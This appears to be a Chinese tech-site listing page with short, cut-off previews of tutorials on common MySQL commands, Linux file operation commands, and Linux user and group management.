    下面给大家分享mysql常用命令, -- 启动数据库 service myslqd start; -- 进入MySQL -u root -p/mysql -h localhost -u root -p DatabaseName; -- 列出数据库 show database; -- 创建数据库 create database XXXX; -- 选择数据库 use DatabaseName; -- 罗列表 show table; -- 显示表格的属性 show columns from table

  • Linux文件操作高频使用命令小结

    0.新建操作: mkdir abc #新建一个文件夹 touch abc.sh #新建一个文件 1.查看操作 查看目录: ll #显示目录文件详细信息 查看文件内容: cat|head|tail命令 cat abc.txt #查看abc的内容 head -5 abc.txt #查看abc前5行内容.默认是10行 tail [选项] 文件名 各选项的含义如下: +num:从第num行以后开始显示 -num:从距文件尾num行处开始显示.如果省略num参数,系统默认值为10. -f: 循环读取,例如

  • Linux系统用户管理命令小结

    用户和组管理 1.用户/组基本概念 Users and groups: . Every process (running program) on the system runs as a particular user. . Every file is owned by a particular user. . Access to files and directories are restricted by user. . The user associated with a running

随机推荐